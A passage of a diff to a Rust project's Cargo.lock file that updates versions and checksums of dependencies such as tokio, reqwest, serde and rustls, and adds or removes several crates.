 [[package]]
-name = "libc"
-version = "0.2.171"
+name = "leb128fmt"
+version = "0.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c19937216e9d3aa9956d9bb8dfc0b0c8beb6058fc4f7a4dc4d850edf86a237d6"
+checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2"
 
 [[package]]
-name = "libredox"
-version = "0.1.3"
+name = "libc"
+version = "0.2.186"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d"
-dependencies = [
- "bitflags",
- "libc",
- "redox_syscall",
-]
+checksum = "68ab91017fe16c622486840e4c83c9a37afeff978bd239b5293d61ece587de66"
 
 [[package]]
 name = "linux-raw-sys"
-version = "0.9.3"
+version = "0.12.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "fe7db12097d22ec582439daf8618b8fdd1a7bef6270e9af3b1ebcd30893cf413"
+checksum = "32a66949e030da00e8c7d4434b251670a91556f4144941d37452769c25d58a53"
 
 [[package]]
 name = "litemap"
-version = "0.7.5"
+version = "0.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "23fb14cb19457329c82206317a5663005a4d404783dc74f4252769b0d5f42856"
+checksum = "92daf443525c4cce67b150400bc2316076100ce0b3686209eb8cf3c31612e6f0"
 
 [[package]]
 name = "lock_api"
-version = "0.4.12"
+version = "0.4.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "07af8b9cdd281b7915f413fa73f29ebd5d55d0d3f0155584dade1ff18cea1b17"
+checksum = "224399e74b87b5f3557511d98dff8b14089b3dadafcab6bb93eab67d3aace965"
 dependencies = [
- "autocfg",
  "scopeguard",
 ]
 
 [[package]]
 name = "log"
-version = "0.4.26"
+version = "0.4.29"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "30bde2b3dc3671ae49d8e2e9f044c7c005836e7a023ee57cffa25ab82764bb9e"
+checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897"
 
 [[package]]
 name = "memchr"
-version = "2.7.4"
+version = "2.8.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3"
+checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79"
 
 [[package]]
 name = "mime"
@@ -905,29 +884,30 @@ checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
 [[package]]
 name = "miniz_oxide"
-version = "0.8.5"
+version = "0.8.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5"
+checksum = "1fa76a2c86f704bdb222d66965fb3d63269ce38518b83cb0575fca855ebb6316"
 dependencies = [
  "adler2",
+ "simd-adler32",
 ]
 
 [[package]]
 name = "mio"
-version = "1.0.3"
+version = "1.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd"
+checksum = "50b7e5b27aa02a74bac8c3f23f448f8d87ff11f92d3aac1a6ed369ee08cc56c1"
 dependencies = [
  "libc",
- "wasi 0.11.0+wasi-snapshot-preview1",
- "windows-sys 0.52.0",
+ "wasi",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "native-tls"
-version = "0.2.14"
+version = "0.2.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "87de3442987e9dbec73158d5c715e7ad9072fda936bb03d19d7fa10e00520f0e"
+checksum = "465500e14ea162429d264d44189adc38b199b62b1c21eea9f69e4b73cb03bbf2"
 dependencies = [
  "libc",
  "log",
@@ -950,31 +930,27 @@ dependencies = [
 ]
 
 [[package]]
-name = "object"
-version = "0.36.7"
+name = "once_cell"
+version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "62948e14d923ea95ea2c7c86c71013138b66525b86bdc08d2dcc262bdb497b87"
-dependencies = [
- "memchr",
-]
+checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
 
 [[package]]
-name = "once_cell"
-version = "1.21.1"
+name = "once_cell_polyfill"
+version = "1.70.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d75b0bedcc4fe52caa0e03d9f1151a323e4aa5e2d78ba3580400cd3c9e2bc4bc"
+checksum = "384b8ab6d37215f3c5301a95a4accb5d64aa607f1fcb26a11b5303878451b4fe"
 
 [[package]]
 name = "openssl"
-version = "0.10.71"
+version = "0.10.79"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5e14130c6a98cd258fdcb0fb6d744152343ff729cbfcb28c656a9d12b999fbcd"
+checksum = "bf0b434746ee2832f4f0baf10137e1cabb18cbe6912c69e2e33263c45250f542"
 dependencies = [
  "bitflags",
  "cfg-if",
  "foreign-types",
  "libc",
- "once_cell",
  "openssl-macros",
  "openssl-sys",
 ]
@@ -992,15 +968,15 @@ dependencies = [
 
 [[package]]
 name = "openssl-probe"
-version = "0.1.6"
+version = "0.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d05e27ee213611ffe7d6348b942e8f942b37114c00cc03cec254295a4a17852e"
+checksum = "7c87def4c32ab89d880effc9e097653c8da5d6ef28e6b539d313baaacfbafcbe"
 
 [[package]]
 name = "openssl-sys"
-version = "0.9.106"
+version = "0.9.115"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8bb61ea9811cc39e3c2069f40b8b8e2e70d8569b361f879786cc7ed48b777cdd"
+checksum = "158fe5b292746440aa6e7a7e690e55aeb72d41505e2804c23c6973ad0e9c9781"
 dependencies = [
  "cc",
  "libc",
@@ -1010,9 +986,9 @@ dependencies = [
 
 [[package]]
 name = "parking_lot"
-version = "0.12.3"
+version = "0.12.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f1bf18183cf54e8d6059647fc3063646a1801cf30896933ec2311622cc4b9a27"
+checksum = "93857453250e3077bd71ff98b6a65ea6621a19bb0f559a85248955ac12c45a1a"
 dependencies = [
  "lock_api",
  "parking_lot_core",
@@ -1020,88 +996,107 @@ dependencies = [
 
 [[package]]
 name = "parking_lot_core"
-version = "0.9.10"
+version = "0.9.12"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1e401f977ab385c9e4e3ab30627d6f26d00e2c73eef317493c4ec6d468726cf8"
+checksum = "2621685985a2ebf1c516881c026032ac7deafcda1a2c9b7850dc81e3dfcb64c1"
 dependencies = [
  "cfg-if",
  "libc",
  "redox_syscall",
  "smallvec",
- "windows-targets 0.52.6",
+ "windows-link",
 ]
 
 [[package]]
 name = "percent-encoding"
-version = "2.3.1"
+version = "2.3.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e3148f5046208a5d56bcfc03053e3ca6334e51da8dfb19b6cdc8b306fae3283e"
+checksum = "9b4f627cb1b25917193a259e49bdad08f671f8d9708acfd5fe0a8c1455d87220"
 
 [[package]]
 name = "pin-project-lite"
-version = "0.2.16"
+version = "0.2.17"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3b3cff922bd51709b605d9ead9aa71031d81447142d828eb4a6eba76fe619f9b"
-
-[[package]]
-name = "pin-utils"
-version = "0.1.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8b870d8c151b6f2fb93e84a13146138f05d02ed11c7e7c54f8826aaaf7c9f184"
+checksum = "a89322df9ebe1c1578d689c92318e070967d1042b512afbe49518723f4e6d5cd"
 
 [[package]]
 name = "pkg-config"
-version = "0.3.32"
+version = "0.3.33"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
+checksum = "19f132c84eca552bf34cab8ec81f1c1dcc229b811638f9d283dceabe58c5569e"
 
 [[package]]
 name = "portable-atomic"
-version = "1.11.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "350e9b48cbc6b0e028b0473b114454c6316e57336ee184ceab6e53f72c178b3e"
+checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49"
 
 [[package]]
 name = "portable-atomic-util"
-version = "0.2.4"
+version = "0.2.7"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d8a2f0d8d040d7848a709caf78912debcc3f33ee4b3cac47d73d1e1069e83507"
+checksum = "c2a106d1259c23fac8e543272398ae0e3c0b8d33c88ed73d0cc71b0f1d902618"
 dependencies = [
  "portable-atomic",
 ]
 
 [[package]]
-name = "proc-macro2"
-version = "1.0.94"
+name = "potential_utf"
+version = "0.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a31971752e70b8b2686d7e46ec17fb38dad4051d94024c88df49b667caea9c84"
+checksum = "0103b1cef7ec0cf76490e969665504990193874ea05c85ff9bab8b911d0a0564"
+dependencies = [
+ "zerovec",
+]
+
+[[package]]
+name = "prettyplease"
+version = "0.2.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b"
+dependencies = [
+ "proc-macro2",
+ "syn",
+]
+
+[[package]]
+name = "proc-macro2"
+version = "1.0.106"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934"
 dependencies = [
  "unicode-ident",
 ]
 
 [[package]]
 name = "quote"
-version = "1.0.40"
+version = "1.0.45"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1885c039570dc00dcb4ff087a89e185fd56bae234ddc7f056a945bf36467248d"
+checksum = "41f2619966050689382d2b44f664f4bc593e129785a36d6ee376ddf37259b924"
 dependencies = [
  "proc-macro2",
 ]
 
 [[package]]
-name = "redox_syscall"
-version = "0.5.10"
+name = "r-efi"
+version = "6.0.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0b8c0c260b63a8219631167be35e6a988e9554dbd323f8bd08439c8ed1302bd1"
+checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf"
+
+[[package]]
+name = "redox_syscall"
+version = "0.5.18"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d"
 dependencies = [
  "bitflags",
 ]
 
 [[package]]
 name = "regex"
-version = "1.11.1"
+version = "1.12.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b544ef1b4eac5dc2db33ea63606ae9ffcfac26c1416a2806ae0bf5f56b201191"
+checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276"
 dependencies = [
  "aho-corasick",
  "memchr",
@@ -1111,9 +1106,9 @@ dependencies = [
 
 [[package]]
 name = "regex-automata"
-version = "0.4.9"
+version = "0.4.14"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "809e8dc61f6de73b46c85f4c96486310fe304c434cfa43669d7b40f711150908"
+checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f"
 dependencies = [
  "aho-corasick",
  "memchr",
@@ -1122,21 +1117,20 @@ dependencies = [
 
 [[package]]
 name = "regex-syntax"
-version = "0.8.5"
+version = "0.8.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2b15c43186be67a4fd63bee50d0303afffcef381492ebe2c5d87f324e1b8815c"
+checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a"
 
 [[package]]
 name = "reqwest"
-version = "0.12.14"
+version = "0.12.28"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "989e327e510263980e231de548a33e63d34962d29ae61b467389a1a09627a254"
+checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
 dependencies = [
  "base64",
  "bytes",
  "encoding_rs",
  "futures-core",
- "futures-util",
  "h2",
  "http",
  "http-body",
@@ -1145,29 +1139,26 @@ dependencies = [
  "hyper-rustls",
  "hyper-tls",
  "hyper-util",
- "ipnet",
  "js-sys",
  "log",
  "mime",
  "native-tls",
- "once_cell",
  "percent-encoding",
  "pin-project-lite",
- "rustls-pemfile",
+ "rustls-pki-types",
  "serde",
  "serde_json",
  "serde_urlencoded",
  "sync_wrapper",
- "system-configuration",
  "tokio",
  "tokio-native-tls",
  "tower",
+ "tower-http",
  "tower-service",
  "url",
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "windows-registry",
 ]
 
 [[package]]
@@ -1178,36 +1169,30 @@ checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7"
 dependencies = [
  "cc",
  "cfg-if",
- "getrandom 0.2.15",
+ "getrandom 0.2.17",
  "libc",
  "untrusted",
  "windows-sys 0.52.0",
 ]
 
 [[package]]
-name = "rustc-demangle"
-version = "0.1.24"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "719b953e2095829ee67db738b3bfa9fa368c94900df327b3f07fe6e794d2fe1f"
-
-[[package]]
 name = "rustix"
-version = "1.0.2"
+version = "1.1.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f7178faa4b75a30e269c71e61c353ce2748cf3d76f0c44c393f4e60abf49b825"
+checksum = "b6fe4565b9518b83ef4f91bb47ce29620ca828bd32cb7e408f0062e9930ba190"
 dependencies = [
  "bitflags",
  "errno",
  "libc",
  "linux-raw-sys",
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "rustls"
-version = "0.23.23"
+version = "0.23.40"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "47796c98c480fce5406ef69d1c76378375492c3b0a0de587be0c1d9feb12f395"
+checksum = "ef86cd5876211988985292b91c96a8f2d298df24e75989a43a3c73f2d4d8168b"
 dependencies = [
  "once_cell",
  "rustls-pki-types",
@@ -1217,25 +1202,19 @@ dependencies = [
 ]
 
 [[package]]
-name = "rustls-pemfile"
-version = "2.2.0"
+name = "rustls-pki-types"
+version = "1.14.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dce314e5fee3f39953d46bb63bb8a46d40c2f8fb7cc5a3b6cab2bde9721d6e50"
+checksum = "30a7197ae7eb376e574fe940d068c30fe0462554a3ddbe4eca7838e049c937a9"
 dependencies = [
- "rustls-pki-types",
+ "zeroize",
 ]
 
 [[package]]
-name = "rustls-pki-types"
-version = "1.11.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "917ce264624a4b4db1c364dcc35bfca9ded014d0a958cd47ad3e960e988ea51c"
-
-[[package]]
 name = "rustls-webpki"
-version = "0.102.8"
+version = "0.103.13"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "64ca1bc8749bd4cf37b5ce386cc146580777b4e8572c7b97baf22c83f444bee9"
+checksum = "61c429a8649f110dddef65e2a5ad240f747e85f7758a6bccc7e5777bd33f756e"
 dependencies = [
  "ring",
  "rustls-pki-types",
@@ -1244,15 +1223,15 @@ dependencies = [
 
 [[package]]
 name = "rustversion"
-version = "1.0.20"
+version = "1.0.22"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "eded382c5f5f786b989652c49544c4877d9f015cc22e145a5ea8ea66c2921cd2"
+checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d"
 
 [[package]]
 name = "ryu"
-version = "1.0.20"
+version = "1.0.23"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "28d3b2b1366ec20994f1fd18c3c594f05c5dd4bc44d8bb0c1c632c8d6829481f"
+checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f"
 
 [[package]]
 name = "same-file"
@@ -1265,11 +1244,11 @@ dependencies = [
 
 [[package]]
 name = "schannel"
-version = "0.1.27"
+version = "0.1.29"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1f29ebaa345f945cec9fbbc532eb307f0fdad8161f281b6369539c8d84876b3d"
+checksum = "91c1b7e4904c873ef0710c1f407dde2e6287de2bebc1bbbf7d430bb7cbffd939"
 dependencies = [
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -1280,12 +1259,12 @@ checksum = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49"
 
 [[package]]
 name = "security-framework"
-version = "2.11.1"
+version = "3.7.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "897b2245f0b511c87893af39b033e5ca9cce68824c4d7e7630b5a1d339658d02"
+checksum = "b7f4bc775c73d9a02cde8bf7b2ec4c9d12743edf609006c7facc23998404cd1d"
 dependencies = [
  "bitflags",
- "core-foundation",
+ "core-foundation 0.10.1",
  "core-foundation-sys",
  "libc",
  "security-framework-sys",
@@ -1293,28 +1272,44 @@ dependencies = [
 
 [[package]]
 name = "security-framework-sys"
-version = "2.14.0"
+version = "2.17.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "49db231d56a190491cb4aeda9527f1ad45345af50b0851622a7adb8c03b01c32"
+checksum = "6ce2691df843ecc5d231c0b14ece2acc3efb62c0a398c7e1d875f3983ce020e3"
 dependencies = [
  "core-foundation-sys",
  "libc",
 ]
 
 [[package]]
-name = "serde"
-version = "1.0.219"
+name = "semver"
+version = "1.0.28"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5f0e2c6ed6606019b4e29e69dbaba95b11854410e5347d525002456dbbb786b6"
+checksum = "8a7852d02fc848982e0c167ef163aaff9cd91dc640ba85e263cb1ce46fae51cd"
+
+[[package]]
+name = "serde"
+version = "1.0.228"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e"
+dependencies = [
+ "serde_core",
+ "serde_derive",
+]
+
+[[package]]
+name = "serde_core"
+version = "1.0.228"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad"
 dependencies = [
  "serde_derive",
 ]
 
 [[package]]
 name = "serde_derive"
-version = "1.0.219"
+version = "1.0.228"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5b0276cf7f2c73365f7157c8123c21cd9a50fbbd844757af28ca1f5925fc2a00"
+checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -1323,14 +1318,15 @@ dependencies = [
 
 [[package]]
 name = "serde_json"
-version = "1.0.140"
+version = "1.0.149"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "20068b6e96dc6c9bd23e01df8827e6c7e1f2fddd43c21810382803c136b99373"
+checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86"
 dependencies = [
  "itoa",
  "memchr",
- "ryu",
  "serde",
+ "serde_core",
+ "zmij",
 ]
 
 [[package]]
@@ -1353,43 +1349,47 @@ checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64"
 
 [[package]]
 name = "signal-hook-registry"
-version = "1.4.2"
+version = "1.4.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a9e9e0b4211b72e7b8b6e85c807d36c212bdb33ea8587f7569562a84df5465b1"
+checksum = "c4db69cba1110affc0e9f7bcd48bbf87b3f4fc7c61fc9155afd4c469eb3d6c1b"
 dependencies = [
+ "errno",
  "libc",
 ]
+
+[[package]]
+name = "simd-adler32"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "703d5c7ef118737c72f1af64ad2f6f8c5e1921f818cdcb97b8fe6fc69bf66214"
 
 [[package]]
 name = "slab"
-version = "0.4.9"
+version = "0.4.12"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8f92a496fb766b417c996b9c5e57daf2f7ad3b0bebe1ccfca4856390e3d3bb67"
-dependencies = [
- "autocfg",
-]
+checksum = "0c790de23124f9ab44544d7ac05d60440adc586479ce501c1d6d7da3cd8c9cf5"
 
 [[package]]
 name = "smallvec"
-version = "1.14.0"
+version = "1.15.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd"
+checksum = "67b1b7a3b5fe4f1376887184045fcf45c69e92af734b7aaddc05fb777b6fbd03"
 
 [[package]]
 name = "socket2"
-version = "0.5.8"
+version = "0.6.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c970269d99b64e60ec3bd6ad27270092a5394c4e309314b18ae3fe575695fbe8"
+checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e"
 dependencies = [
  "libc",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "stable_deref_trait"
-version = "1.2.0"
+version = "1.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a8f112729512f8e442d81f95a8a7ddf2b7c6b8a1a6f509a95864142b30cab2d3"
+checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596"
 
 [[package]]
 name = "strsim"
@@ -1405,9 +1405,9 @@ checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292"
 
 [[package]]
 name = "syn"
-version = "2.0.100"
+version = "2.0.117"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b09a44accad81e1ba1cd74a32461ba89dee89095ba17b32f5d03683b1b1fc2a0"
+checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -1425,9 +1425,9 @@ dependencies = [
 
 [[package]]
 name = "synstructure"
-version = "0.13.1"
+version = "0.13.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c8af7666ab7b6390ab78131fb5b0fce11d6b7a6951602017c35fa82800708971"
+checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -1436,12 +1436,12 @@ dependencies = [
 
 [[package]]
 name = "system-configuration"
-version = "0.6.1"
+version = "0.7.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3c879d448e9d986b661742763247d3693ed13609438cf3d006f51f5368a5ba6b"
+checksum = "a13f3d0daba03132c0aa9767f98351b3488edc2c100cda2d2ec2b04f3d8d3c8b"
 dependencies = [
  "bitflags",
- "core-foundation",
+ "core-foundation 0.9.4",
  "system-configuration-sys",
 ]
 
@@ -1457,9 +1457,9 @@ dependencies = [
 
 [[package]]
 name = "tar"
-version = "0.4.44"
+version = "0.4.45"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1d863878d212c87a19c1a610eb53bb01fe12951c0501cf5a0d65f724914a667a"
+checksum = "22692a6476a21fa75fdfc11d452fda482af402c008cdbaf3476414e122040973"
 dependencies = [
  "filetime",
  "libc",
@@ -1468,31 +1468,31 @@ dependencies = [
 
 [[package]]
 name = "tempfile"
-version = "3.19.0"
+version = "3.27.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "488960f40a3fd53d72c2a29a58722561dee8afdd175bd88e3db4677d7b2ba600"
+checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
 dependencies = [
  "fastrand",
- "getrandom 0.3.1",
+ "getrandom 0.4.2",
  "once_cell",
  "rustix",
- "windows-sys 0.59.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "thiserror"
-version = "2.0.12"
+version = "2.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "567b8a2dae586314f7be2a752ec7474332959c6460e02bde30d702a66d488708"
+checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4"
 dependencies = [
  "thiserror-impl",
 ]
 
 [[package]]
 name = "thiserror-impl"
-version = "2.0.12"
+version = "2.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7f7cf42b4507d8ea322120659672cf1b9dbb93f8f2d4ecfd6e51350ff5b17a1d"
+checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -1501,9 +1501,9 @@ dependencies = [
 
 [[package]]
 name = "tinystr"
-version = "0.7.6"
+version = "0.8.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9117f5d4db391c1cf6927e7bea3db74b9a1c1add8f7eda9ffd5364f40f57b82f"
+checksum = "c8323304221c2a851516f22236c5722a72eaa19749016521d6dff0824447d96d"
 dependencies = [
  "displaydoc",
  "zerovec",
@@ -1511,11 +1511,10 @@ dependencies = [
 
 [[package]]
 name = "tokio"
-version = "1.44.1"
+version = "1.52.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f382da615b842244d4b8738c82ed1275e6c5dd90c459a30941cd07080b06c91a"
+checksum = "8fc7f01b389ac15039e4dc9531aa973a135d7a4135281b12d7c1bc79fd57fffe"
 dependencies = [
- "backtrace",
  "bytes",
  "libc",
  "mio",
@@ -1524,14 +1523,14 @@ dependencies = [
  "signal-hook-registry",
  "socket2",
  "tokio-macros",
- "windows-sys 0.52.0",
+ "windows-sys 0.61.2",
 ]
 
 [[package]]
 name = "tokio-macros"
-version = "2.5.0"
+version = "2.7.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6e06d43f1345a3bcd39f6a56dbb7dcab2ba47e68e8ac134855e7e2bdbaf8cab8"
+checksum = "385a6cb71ab9ab790c5fe8d67f1645e6c450a7ce006a33de03daa956cf70a496"
 dependencies = [
  "proc-macro2",
  "quote",
@@ -1550,9 +1549,9 @@ dependencies = [
 
 [[package]]
 name = "tokio-rustls"
-version = "0.26.2"
+version = "0.26.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e727b36a1a0e8b74c376ac2211e40c2c8af09fb4013c60d910495810f008e9b"
+checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61"
 dependencies = [
  "rustls",
  "tokio",
@@ -1560,9 +1559,9 @@ dependencies = [
 
 [[package]]
 name = "tokio-util"
-version = "0.7.14"
+version = "0.7.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6b9590b93e6fcc1739458317cccd391ad3955e2bde8913edf6f95f9e65a8f034"
+checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098"
 dependencies = [
  "bytes",
  "futures-core",
@@ -1573,9 +1572,9 @@ dependencies = [
 
 [[package]]
 name = "tower"
-version = "0.5.2"
+version = "0.5.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "d039ad9159c98b70ecfd540b2573b97f7f52c3e8d9f8ad57a24b916a536975f9"
+checksum = "ebe5ef63511595f1344e2d5cfa636d973292adc0eec1f0ad45fae9f0851ab1d4"
 dependencies = [
  "futures-core",
  "futures-util",
@@ -1584,6 +1583,24 @@ dependencies = [
  "tokio",
  "tower-layer",
  "tower-service",
+]
+
+[[package]]
+name = "tower-http"
+version = "0.6.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "68d6fdd9f81c2819c9a8b0e0cd91660e7746a8e6ea2ba7c6b2b057985f6bcb51"
+dependencies = [
+ "bitflags",
+ "bytes",
+ "futures-util",
+ "http",
+ "http-body",
+ "pin-project-lite",
+ "tower",
+ "tower-layer",
+ "tower-service",
+ "url",
 ]
 
 [[package]]
@@ -1600,9 +1617,9 @@ checksum = "8df9b6e13f2d32c91b9bd719c00d1958837bc7dec474d94952798cc8e69eeec3"
 
 [[package]]
 name = "tracing"
-version = "0.1.41"
+version = "0.1.44"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "784e0ac535deb450455cbfa28a6f0df145ea1bb7ae51b821cf5e7927fdcfbdd0"
+checksum = "63e71662fa4b2a2c3a26f570f037eb95bb1f85397f3cd8076caed2f026a6d100"
 dependencies = [
  "pin-project-lite",
  "tracing-core",
@@ -1610,9 +1627,9 @@ dependencies = [
 
 [[package]]
 name = "tracing-core"
-version = "0.1.33"
+version = "0.1.36"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e672c95779cf947c5311f83787af4fa8fffd12fb27e4993211a84bdfd9610f9c"
+checksum = "db97caf9d906fbde555dd62fa95ddba9eecfd14cb388e4f491a66d74cd5fb79a"
 dependencies = [
  "once_cell",
 ]
@@ -1625,9 +1642,15 @@ checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
 
 [[package]]
 name = "unicode-ident"
-version = "1.0.18"
+version = "1.0.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5a5f39404a5da50712a4c1eecf25e90dd62b613502b7e925fd4e4d19b5c96512"
